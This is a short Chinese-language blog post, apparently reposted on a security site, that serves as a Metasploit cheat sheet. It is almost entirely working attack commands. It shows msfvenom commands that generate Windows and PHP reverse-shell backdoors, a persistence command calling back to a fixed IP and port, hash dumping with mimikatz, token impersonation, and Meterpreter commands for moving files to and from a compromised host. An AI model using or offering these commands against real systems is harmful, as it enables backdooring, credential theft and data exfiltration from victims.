关注我们

Metasploit笔记

安云安云 安全文摘 2019-08-08 488150 0

Metasploit笔记

生成exe后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe

生成PHP后门

msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > php.php

使用监听模块(默认)

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

搜寻存在漏洞模块

post/multi/recon/local_exploit_suggester

迁移进程

migrate pid

权限维持 -Persistence

run persistence -U -i 10 -p 4444 -r 192.168.61.3

抓取Hash

run hashdump

load mimikatz

令牌伪装

list_tokens-u

如果查看失败先用

use incognito 或者 load incognito

进入该模块 再使用

impersonate_token 用户名

基本操作命令

ls:列出当前路径下的所有文件和文件夹。

pwd 或 getwd:查看当前路径。

search:搜索文件,使用 search -h 查看帮助。

cat:查看文件内容,比如 cat test.txt

edit:编辑或者创建文件。和Linux系统的vm命令类似,同样适用于目标系统是windows的情况。

rm:删除文件。

cd:切换路径。

mkdir:创建文件夹。

rmdir:删除文件夹。

getlwd 或 lpwd:查看自己系统的当前路径。

lcd:切换自己当前系统的目录。

lls:显示自己当前系统的所有文件和文件夹。

upload: upload 本地文件路径目标文件路径.

download: download 目标文件路径 本地文件路径

文由http://www.qisafe.net/?p=232

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢1发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址